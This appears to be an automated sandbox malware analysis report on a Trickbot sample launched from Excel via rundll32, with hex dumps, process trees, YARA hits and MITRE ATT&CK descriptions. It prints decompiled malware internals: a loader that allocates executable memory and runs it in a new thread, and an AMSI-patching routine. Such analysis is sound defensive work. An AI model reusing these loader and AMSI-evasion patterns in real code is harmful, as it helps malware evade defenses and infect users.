May 12, 2021 18:42:55.879559040 CEST	6	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 12, 2021 18:42:55.879581928 CEST	7	IN	Data Raw: ff ff e8 a5 ab 01 00 8b 4c 24 08 5e 64 89 0d 00 00 00 00 83 c4 10 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 6a ff 68 8b 7c 02 10 64 a1 00 00 00 00 50 64 89 25 00 00 00 00 81 ec 14 03 00 00 a1 bc 51 03 10 56 89 84 24 14 03 00 00 8b f1 ff 15 28 90 Data Ascii: L$^djh\|dPd%QV$(/j@jL$dD$L$$ FTL$$ $d$3^C QVD$3jL$QhPt!D$
May 12, 2021 18:42:55.879606009 CEST	8	IN	Data Raw: 5f 5b c3 56 50 ff 15 8c 92 02 10 8b f0 85 f6 75 06 5e 5f 33 c0 5b c3 57 53 ff 15 90 92 02 10 8b 4c 24 18 03 c6 83 e1 0f 76 0e 3b f0 73 e3 49 0f b7 16 8d 74 56 02 75 f2 3b f0 73 d5 66 8b 06 66 f7 d8 1b c0 23 c6 5e 5f 5b c3 83 ec 70 a1 bc 51 03 10 Data Ascii: _[VPu^_3[WSL$v;sItVu;sff#^_[pQD$lthxS3UD$D$l.VD$HD$)D$@WPD$HkD$IeD$JrD$KnD$Le\$MD$N3D$O2D$Qd\$R\$SD$TD$,nD$-tD$.d\$/\$0D$2d\$3\$4D$5:c
May 12, 2021 18:42:55.879633904 CEST	10	IN	Data Raw: 68 04 8d 43 0c 83 c9 ff f0 0f c1 08 49 85 c9 5f 7f 08 8b 0b 8b 11 53 ff 52 04 8b 44 24 14 8b 4c 24 0c 5e 5d 89 01 5b 59 c2 04 00 cc cc cc cc cc 56 57 8b 7c 24 0c 8b f1 8b 06 8b 48 f0 8b 11 83 e8 10 6a 01 57 50 ff 52 08 85 c0 75 05 e8 4e ff ff ff Data Ascii: hCI_SRD$L$^][YVW\|$HjWPRuN_^VD$tVh^VW\|$PhWZQhWHlRhW6VhW$_^d
May 12, 2021 18:42:55.879657984 CEST	11	IN	Data Raw: e9 02 83 c6 10 8d 78 10 f3 a5 8b ca 83 e1 03 f3 a4 5f 5e c3 cc cc 55 8b ec 6a ff 68 d0 7c 02 10 64 a1 00 00 00 00 50 64 89 25 00 00 00 00 81 ec 98 01 00 00 a1 bc 51 03 10 53 56 57 33 db 8b f1 89 65 f0 53 8d 8e a4 01 00 00 68 41 10 00 00 89 45 ec Data Ascii: x_^Ujh\|dPd%QSVW3eShAEh4]^\|P \Qh<;t)Ph2MdM_^[]RUb$V+^
May 12, 2021 18:42:55.879682064 CEST	12	IN	Data Raw: f0 8b 07 8b 50 fc 83 e8 10 b9 01 00 00 00 2b ca 8b 50 08 2b d6 83 c4 08 0b ca 7d 08 56 8b cf e8 08 fa ff ff 8b 07 55 53 50 e8 7b c2 00 00 83 c4 0c 85 f6 7c 17 8b 07 3b 70 f8 7f 10 89 70 f4 8b 0f c6 04 0e 00 5e 5d 5f 5b c2 08 00 68 57 00 07 80 e8 Data Ascii: P+P+}VUSP{\|;pp^]_[hWvD$SUl$Vt$EP+P+}SEt$WT$L$$t$ <_\|E;XXM^][hWQSUE
May 12, 2021 18:42:55.879704952 CEST	14	IN	Data Raw: e8 9d fa ff ff c3 cc cc cc cc cc cc cc cc cc cc cc cc 6a ff 68 68 7d 02 10 64 a1 00 00 00 00 50 64 89 25 00 00 00 00 51 56 8b 74 24 1c 8b 06 8b 48 f0 8b 11 57 33 ff 89 7c 24 08 ff 52 10 8b 10 8b c8 ff 52 0c 83 c0 10 89 44 24 20 8b 44 24 24 8b 00 Data Ascii: jhh}dPd%QVt$HW3\|$RRD$ D$$PqRPVQL$0Q\|$(t$4V\|$4D$VHVRL$_^dVt$u3PV^Wxd$@u+_PV
May 12, 2021 18:42:56.070539951 CEST	16	IN	Data Raw: 44 fc ff ff 8b 7c 24 34 50 8d 44 24 18 57 50 c7 44 24 38 00 00 00 00 e8 bc fa ff ff 8d 4f 04 51 50 8d 4c 24 24 51 c6 44 24 44 01 e8 a8 fa ff ff 83 c4 18 8b 44 24 14 83 c0 f0 c6 44 24 2c 04 8d 50 0c 83 c9 ff f0 0f c1 0a 49 85 c9 7f 08 8b 08 8b 11 Data Ascii: D\|$4PD$WPD$8OQPL$$QD$DD$D$,PIPRD$D$,HJPRD$hhjjjjjPj#9qWjjjjjjUphUjjjjjh(j#qRD$4D$ h

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 1288 Parent PID: 584

General

Start time:	18:42:38
Start date:	12/05/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13f1b0000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 2340 Parent PID: 1288

General

Start time:	18:42:43
Start date:	12/05/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32 ..\hsdksksk.iem,StartW
Imagebase:	0xffae0000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 2312 Parent PID: 2340

General

Start time:	18:42:43
Start date:	12/05/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32 ..\hsdksksk.iem,StartW
Imagebase:	0xe90000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2096107632.0000000000310000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2096083539.0000000000291000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2096003608.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2096037791.0000000000224000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: wermgr.exe PID: 260 Parent PID: 2312

General

Start time:	18:42:44
Start date:	12/05/2021
Path:	C:\Windows\System32\wermgr.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\wermgr.exe
Imagebase:
File size:	50688 bytes
MD5 hash:	41DF7355A5A907E2C1D7804EC028965D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: rundll32.exe PID: 2312 Parent PID: 2340 rundll32.exeCOMMON

Executed Functions

Function 00221030, Relevance: 18.4, APIs: 12, Instructions: 362libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(00224054), ref: 00221047
GetProcAddress.KERNEL32(00000000), ref: 0022104E

Part of subcall function 00221B30: SetLastError.KERNEL32(0000000D,?,00221070,?,00000040), ref: 00221B3D

SetLastError.KERNEL32(000000C1), ref: 00221096

Memory Dump Source

Source File: 00000004.00000002.2096031569.0000000000221000.00000020.00000001.sdmp, Offset: 00221000, based on PE: false

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID:
API String ID: 1866314245-0
Opcode ID: 78844a6c1ce339e2192fd588e42e34abda374145686de0ccdc5088dff0722e07
Instruction ID: 2b4d2659461ea3dffea703b17265c8153879ff5e8a96848902ec63ebba55de00
Opcode Fuzzy Hash: 78844a6c1ce339e2192fd588e42e34abda374145686de0ccdc5088dff0722e07
Instruction Fuzzy Hash: 8DF109B4A10219EFDB04DFD4E984EAEB7B1BF58304F208198E905AB341D775EE61DB90

Uniqueness

Uniqueness Score: -1.00%

Function 002C3450, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101
windowtimesleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E002C3450() {
				_Unknown_base(*)()* _v8;
				void* _v12;
				struct tagMSG _v40;
				long _v44;
				struct HWND__* _v48;
				long _v52;
				void* _v56;
				void* _t38;
				void* _t43;
				int _t45;

				SetTimer(0, 0, 0x25b, 0); // executed
				while(GetMessageW( &_v40, 0, 0, 0) != 0) {
					_v40.message = _v40.message + 1;
					if(_v40.message != 0x114) {
						DispatchMessageW( &_v40);
						continue;
					} else {
					}
					break;
				}
				_v12 = 0;
				_v48 = 0;
				_v52 = 0x5000;
				while(_v52 > 0x1000) {
					_v52 = _v52 - 1;
				}
				_v44 = _v52;
				while(_v44 > 0x40) {
					_v44 = _v44 - 1;
				}
				do {
					_t38 = VirtualAlloc(_v12, 0x43000, _v52, _v44); // executed
					_v8 = _t38;
					if(_v8 == 0) {
						Sleep(0x1f4);
					}
				} while (_v8 == 0);
				_v48 =  &(_v48->i);
				E00291000(_v48, _v8);
				_t43 = CreateThread(0, 0, _v8, 1, 0, 0); // executed
				_v56 = _t43;
				SetTimer(0, 0, 0x2000, 0); // executed
				while(1) {
					_t45 = GetMessageW( &_v40, 0, 0, 0);
					if(_t45 == 0) {
						break;
					}
					_v40.message = _v40.message + 1;
					if(_v40.message == 0x114) {
						return _t45;
					}
					DispatchMessageW( &_v40);
				}
				return _t45;
			}

0x002c3461
0x002c3467
0x002c3481
0x002c348b
0x002c3493
0x00000000
0x00000000
0x002c348d
0x00000000
0x002c348b
0x002c349b
0x002c34a2
0x002c34a9
0x002c34b0
0x002c34bf
0x002c34bf
0x002c34c7
0x002c34ca
0x002c34d6
0x002c34d6
0x002c34db
0x002c34ec
0x002c34f2
0x002c34f9
0x002c3500
0x002c3500
0x002c3506
0x002c3512
0x002c351d
0x002c3530
0x002c3536
0x002c3544
0x002c354a
0x002c3554
0x002c355c
0x00000000
0x00000000
0x002c3564
0x002c356e
0x00000000
0x00000000
0x002c3576
0x002c3576
0x002c3581

APIs

SetTimer.USER32(00000000,00000000,0000025B,00000000), ref: 002C3461
GetMessageW.USER32 ref: 002C3471
DispatchMessageW.USER32(?), ref: 002C3493
VirtualAlloc.KERNELBASE(00000000,00043000,00001000,00000040), ref: 002C34EC
Sleep.KERNEL32(000001F4), ref: 002C3500
CreateThread.KERNELBASE(00000000,00000000,00000000,00000001,00000000,00000000), ref: 002C3530
SetTimer.USER32(00000000,00000000,00002000,00000000), ref: 002C3544
GetMessageW.USER32 ref: 002C3554
DispatchMessageW.USER32(?), ref: 002C3576

Strings

@, xrefs: 002C34CA

Memory Dump Source

Source File: 00000004.00000002.2096083539.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000004.00000002.2096080927.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.2096104218.00000000002C4000.00000002.00000001.sdmp Download File

Yara matches

Similarity

API ID: Message$DispatchTimer$AllocCreateSleepThreadVirtual
String ID: @
API String ID: 368155642-2766056989
Opcode ID: 35529bf03737836d7256465202849a3219807cc7f1caeda82b67af74b798ca5d
Instruction ID: ae92b9a0f27f77fea686ecab1ce2de7eaad505e2131d61dfa5c2710459b6ae49
Opcode Fuzzy Hash: 35529bf03737836d7256465202849a3219807cc7f1caeda82b67af74b798ca5d
Instruction Fuzzy Hash: C9410F70E60208EBDB28DFE4DD59FDD7774BB48705F208518E601BA1C0C7B5AA50DB64

Uniqueness

Uniqueness Score: -1.00%

Function 0031035E, Relevance: 16.3, APIs: 6, Strings: 3, Instructions: 574COMMON

Download Yara Rule

Strings

D7Q, xrefs: 00310693
D7Q, xrefs: 003106EB
^f`, xrefs: 00310448

Memory Dump Source

Source File: 00000004.00000002.2096107632.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false

Yara matches

Similarity

API ID:
String ID: D7Q$D7Q$^f`
API String ID: 0-3924766165
Opcode ID: f945b8cfea5c7b32aa428542931a22643b676651c304577969625df2e73c57ee
Instruction ID: b7d0dc63de1ed41ec6fcb922c53902dc9db44df8f7c26d7a011f80e1eafc47bf
Opcode Fuzzy Hash: f945b8cfea5c7b32aa428542931a22643b676651c304577969625df2e73c57ee
Instruction Fuzzy Hash: B2226874608200DFD72ECF28C494BAA77E1AB8E714F60495AF985DB3A0D6B1D8C1DF52

Uniqueness

Uniqueness Score: -1.00%

Function 002214A0, Relevance: 12.2, APIs: 8, Instructions: 171COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000007F), ref: 002214DB
SetLastError.KERNEL32(0000007F), ref: 00221507

Memory Dump Source

Source File: 00000004.00000002.2096031569.0000000000221000.00000020.00000001.sdmp, Offset: 00221000, based on PE: false

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 4b055d16b40c414dfb2eed71748734606db096af49b9052db200f4cedd01922f
Instruction ID: 29f5bbd5b2630abb74a127cbc9aa4dd4a427c4053ed4c7c624b0f063a55a53c3
Opcode Fuzzy Hash: 4b055d16b40c414dfb2eed71748734606db096af49b9052db200f4cedd01922f
Instruction Fuzzy Hash: 3A710874E10119EFCB08DF94D585AAEB7B2FF58304F648198E416AB341D774AE61CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 002221A0, Relevance: 6.2, APIs: 4, Instructions: 182COMMON

Download Yara Rule

APIs

IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 002221F9
SetLastError.KERNEL32(0000007E), ref: 0022223B

Memory Dump Source

Source File: 00000004.00000002.2096031569.0000000000221000.00000020.00000001.sdmp, Offset: 00221000, based on PE: false

Similarity

API ID: ErrorHugeLastRead
String ID:
API String ID: 3239643929-0
Opcode ID: b7e7decb3e358342bebcc4ae786420f215e66134cd4a4b8bdeb08f0b51f17ebb
Instruction ID: 56f0ef6bc86b70ffcf6c1f405c5059b6609245d6cf4ee995ad2993ffd8cf8583
Opcode Fuzzy Hash: b7e7decb3e358342bebcc4ae786420f215e66134cd4a4b8bdeb08f0b51f17ebb
Instruction Fuzzy Hash: 0C81A874A10219EFDB04CF94D894AAEBBB1FF48314F248198E909AB351C775EE95CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00222720, Relevance: 6.0, APIs: 4, Instructions: 43libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(00224088), ref: 00222731
LoadLibraryW.KERNEL32(0022409C), ref: 00222745
LoadLibraryW.KERNEL32(002240B4), ref: 00222759
LoadLibraryW.KERNEL32(002240D0), ref: 0022276D

Part of subcall function 002214A0: SetLastError.KERNEL32(0000007F), ref: 002214DB

Memory Dump Source

Source File: 00000004.00000002.2096031569.0000000000221000.00000020.00000001.sdmp, Offset: 00221000, based on PE: false

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 3d205574e2f768a6cec9bb6967b78c147844f47c2800ecfdf78a43f3d5ca5677
Instruction ID: cdef69f5a3b0dedfafc9a0c22fa7a2d7f3a08606c6d9d5b1c5a44ed0d8f1f8a7
Opcode Fuzzy Hash: 3d205574e2f768a6cec9bb6967b78c147844f47c2800ecfdf78a43f3d5ca5677
Instruction Fuzzy Hash: AC0144B9D20214FBD704BBF0BC1E85E7E68EF15715F404454F90992241F97657B88B62

Uniqueness

Uniqueness Score: -1.00%

Function 001C002D, Relevance: 4.9, APIs: 3, Instructions: 387memoryCOMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNEL32(?,?,?,?,001C0005), ref: 001C00E9
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,001C0005), ref: 001C0111

Memory Dump Source

Source File: 00000004.00000002.2096003608.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Yara matches

Similarity

API ID: AllocInfoNativeSystemVirtual
String ID:
API String ID: 2032221330-0
Opcode ID: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
Instruction ID: b99b3ca686792105b6f3c94cb45a4d79b9d66a0b5e13362f3dc5241bb8722896
Opcode Fuzzy Hash: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
Instruction Fuzzy Hash: FCD1D071A04346CFDB25CF69C884B6AB3E0FFA8308F19852DE995CB241E774E855CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00221D10, Relevance: 1.6, APIs: 1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2096031569.0000000000221000.00000020.00000001.sdmp, Offset: 00221000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6de4362c164a7857a13f206bff9951f13820ca881dbeaacc5e9cf7242c9791bf
Instruction ID: 26355df4d1d7430278c839f8d5d4e876ae975b23d88ae9c2fa319384da1ad7ba
Opcode Fuzzy Hash: 6de4362c164a7857a13f206bff9951f13820ca881dbeaacc5e9cf7242c9791bf
Instruction Fuzzy Hash: 0241E374A10119EFDB04CF84D490FAAB7B2EB98314F24C159E8195B355C771EEA2CB80

Uniqueness

Uniqueness Score: -1.00%

Function 002219F0, Relevance: 1.3, APIs: 1, Instructions: 14memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00221A51,00003000,00000004,000000BE,?,00221A51,?), ref: 00221A01

Memory Dump Source

Source File: 00000004.00000002.2096031569.0000000000221000.00000020.00000001.sdmp, Offset: 00221000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 94c6945d5650180b39ca9a9779d0589e4e045878a586f536cdaa8e37612f6b10
Instruction ID: 48eaaf464dbb62e7f5053dbcbcfcac871d3fded7db489a27f4c846ebdb111112
Opcode Fuzzy Hash: 94c6945d5650180b39ca9a9779d0589e4e045878a586f536cdaa8e37612f6b10
Instruction Fuzzy Hash: 61D0C9B4645208BBE710CB84DC06F69BBACD704611F004185FE089B280D5B1AF0056A1

Uniqueness

Uniqueness Score: -1.00%

Function 00221820, Relevance: 1.3, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,?,?), ref: 0022182F

Memory Dump Source

Source File: 00000004.00000002.2096031569.0000000000221000.00000020.00000001.sdmp, Offset: 00221000, based on PE: false

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: e22b0fede2147f4006219c57a008a81ee8f401c7d2396d51de385c5f91beb92d
Instruction ID: 21565555276b3a550cfc3fe4fb5a09fe55033e9ba1d98d5948b46e7600a290e7
Opcode Fuzzy Hash: e22b0fede2147f4006219c57a008a81ee8f401c7d2396d51de385c5f91beb92d
Instruction Fuzzy Hash: DBC04C7611430CBB8B04DFD8EC84DAB37ADBB8C610B048508BA1D87204C674FA118BA4

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 001C095E, Relevance: .4, Instructions: 362COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2096003608.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dc4c1101507dda9be7d1ca017cc9ed333707a61feece7f86d76402a0b178a7c
Instruction ID: 0eb41020b5bf8c04fc11a0eb508b52f72e8af8abdad0e5552a6e9b7f2ccdcba6
Opcode Fuzzy Hash: 3dc4c1101507dda9be7d1ca017cc9ed333707a61feece7f86d76402a0b178a7c
Instruction Fuzzy Hash: BCF1E3B4A01209EFDB08CF94C990FAEB7B5AF5C304F208598E906AB345D775EE41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 001C0456, Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2096003608.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
Instruction ID: 1b620ee306fd3e9ab60516432b1401a2d2b30c82ffb0c917b1bd0c26d1f5915c
Opcode Fuzzy Hash: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
Instruction Fuzzy Hash: 17318F76A0474ACFC715DF18C480E2BB7E4FF99314F0609ADEA9587312D734E9468B91

Uniqueness

Uniqueness Score: -1.00%

Function 002224F0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExA.KERNEL32(00224070,00000000,00000800), ref: 00222509
GetProcAddress.KERNEL32(00000000,00224078), ref: 00222525
VirtualProtect.KERNEL32(?,00000004,00000040,?), ref: 00222560
VirtualProtect.KERNEL32(?,00000004,?,?), ref: 00222581

Strings

AMSI, xrefs: 0022254C

Memory Dump Source

Source File: 00000004.00000002.2096031569.0000000000221000.00000020.00000001.sdmp, Offset: 00221000, based on PE: false

Similarity

API ID: ProtectVirtual$AddressLibraryLoadProc
String ID: AMSI
API String ID: 3300690313-3828877684
Opcode ID: 1dcab1a442afd0b148ca75cd24cf5b80fab60509a91e7cf2fb2f0ec4cb427293
Instruction ID: bc99e07423993203cc064ac55fc5499ac14384cc5ea90e3f41a3a8a6c8c26a47
Opcode Fuzzy Hash: 1dcab1a442afd0b148ca75cd24cf5b80fab60509a91e7cf2fb2f0ec4cb427293
Instruction Fuzzy Hash: CB112C74D10219FFCB14CFD4D849BAEB7B4BB08300F608158E6017B240D7B56B65DB55

Uniqueness

Uniqueness Score: -1.00%

Function 00222430, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 00222468
VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 002224B2

Strings

@, xrefs: 00222453

Memory Dump Source

Source File: 00000004.00000002.2096031569.0000000000221000.00000020.00000001.sdmp, Offset: 00221000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID: @
API String ID: 544645111-2766056989
Opcode ID: 66f8f22dc92392df7bcd42784a37c95fc2a69b7563d92f8db18479d5f323a036
Instruction ID: 68790218cb842daeff5920fd90a04269826d9b79eb34eea90ed76c07143f9144
Opcode Fuzzy Hash: 66f8f22dc92392df7bcd42784a37c95fc2a69b7563d92f8db18479d5f323a036
Instruction Fuzzy Hash: 4121F3B0A10219FFDB14DFD8D884BAEBBB5BF44304F208589D905AB240C375AF98DB61

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report c527325d_by_Libranalysis

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Trickbot

Yara Overview

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

